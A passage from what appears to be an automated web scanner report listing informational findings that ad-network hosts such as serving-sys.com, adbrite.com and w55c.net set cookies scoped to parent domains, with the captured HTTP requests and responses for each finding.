HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=2cd7097f-7369-4ae1-ac1c-c726ae580b4d3HM0b0; expires=Sat, 23-Jul-2011 20:35:44 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 25 Apr 2011 00:35:43 GMT
Connection: close
Content-Length: 3916

var part0 = '';
part0 += "<"+"!-- Do Not Remove - Turn Tracking Beacon Code - Do Not Remove -->\n";
part0 += "<"+"!-- Advertiser Name : MYFICO -->\n";
part0 += "<"+"!-- Beacon Name : MYFICO - RETARGE
...[SNIP]...

17.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4440217~~0~~~^ebAdDuration~15~0~01020&OptOut=0&ebRandom=0.2445763300638646&flv=10.2154&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679581&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661581392&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661581397&frm=1&adk=2614322350&ga_vid=918498602.1303661581&ga_sid=1303661581&ga_hid=284338913&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
Origin: http://googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=7f28e9ba-7e75-4938-83a3-fd5f2acd1d9d3HM0b0; expires=Sat, 23-Jul-2011 12:13:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=0; expires=Sat, 23-Jul-2011 12:13:15 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 24 Apr 2011 16:13:15 GMT
Connection: close
Content-Length: 0


17.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2442546&PluID=0&ord=&ord=3226986560327928345&rtu=-1 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676553&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658553416&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658553422&frm=1&adk=513358139&ga_vid=780386006.1303658553&ga_sid=1303658553&ga_hid=1236518823&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=44901218&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGu0cbS00001eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGv0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui8TfJ0000000001uh93M20000000001uf8OuK0000000000ui78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingCachedScripts/Res/Blank_1x1.gif
Server: Microsoft-IIS/7.5
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSi04m400000eDVwaDPh084o00001hH4jaFhv09wy00001hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGu0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Sat, 23-Jul-2011 11:30:19 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui; expires=Sat, 23-Jul-2011 11:30:19 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 24 Apr 2011 15:30:19 GMT
Connection: close


17.51. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=44888252&bapid=5555&uid=730083 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=764562517870.2175?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; srh="1%3Aq64FAA%3D%3D"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSpNqjFNLbEyLLQwLsq0MrIqK6hQqgUA"; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZFtFlK668asQYmeZlJyrSil2cmpVmmCwRKYo%2Bz%2FwRgf"; vsd=0@2@4db48be1@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 24-Jul-2011 00:56:51 GMT
Set-Cookie: ut="1%3AHctBCoAgEAXQu%2Fy1m9FNdBslhQjGHCNRx7sHvf2beC32iSv2luWo2FGKG02pbCmKOg05mGqrkNLdE7N6JXoGDIJnjnL%2BCWt9"; path=/; domain=.adbrite.com; expires=Thu, 22-Apr-2021 00:56:51 GMT
Set-Cookie: vsd=0@1@4db4c6d3@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 00:56:51 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 25 Apr 2011 00:56:51 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.52. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=44888252&bapid=5555&uid=730083 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:44:40 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiosNK4qrzEstDAuTK8xrDHQKTYqLjKsMSyoTMvLq0msMTQsqVLSUUpKzMtLLcoEa1GqrQUA"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:44:40 GMT
Set-Cookie: vsd=0@1@4db48bb8@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:44:40 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:44:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.53. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R99JaasWk_1847829791.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502295&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502306&frm=1&adk=2614322350&ga_vid=880493158.1303658502&ga_sid=1303658502&ga_hid=2002983713&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:28:58 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:02:25 GMT
Date: Sun, 24 Apr 2011 15:27:54 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6967

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUj
...[SNIP]...

17.54. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R9ulNflD0_1008589149.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0R9ulNflD0_1008589149.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAfQAL6XgK5XGOKLxYbPmt5BBxSOnJCdA1hw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZhWXZLM3ZQaA&ciu=MFI5dWxOZmxEMA&reqid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=182&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676624&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658624768&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658624770&frm=1&adk=2614322350&ga_vid=2012220246.1303658625&ga_sid=1303658625&ga_hid=284855663&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:19 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 15:08:20 GMT
Date: Sun, 24 Apr 2011 14:53:07 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1451

<iframe src="http://view.atdmt.com/DEI/iview/310322587/direct/01/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk
...[SNIP]...

17.55. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRALQAI-hAK5XtJGKsHuhilbCHDocZSZdL3wA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=381&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676544&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658544577&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658544581&frm=1&adk=2614322350&ga_vid=1063735003.1303658545&ga_sid=1303658545&ga_hid=467631587&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:22:23 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:12:52 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzN
...[SNIP]...

17.56. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RES95J3Zo_918427505.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516462&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516467&frm=1&adk=2614322350&ga_vid=1758961832.1303658516&ga_sid=1303658516&ga_hid=2008436335&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:39 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 28 Feb 2011 21:20:22 GMT
Date: Sun, 24 Apr 2011 14:52:24 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1248

<IFRAME SRC="http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUk
...[SNIP]...

17.57. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0REyoPRMSz_696710848.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

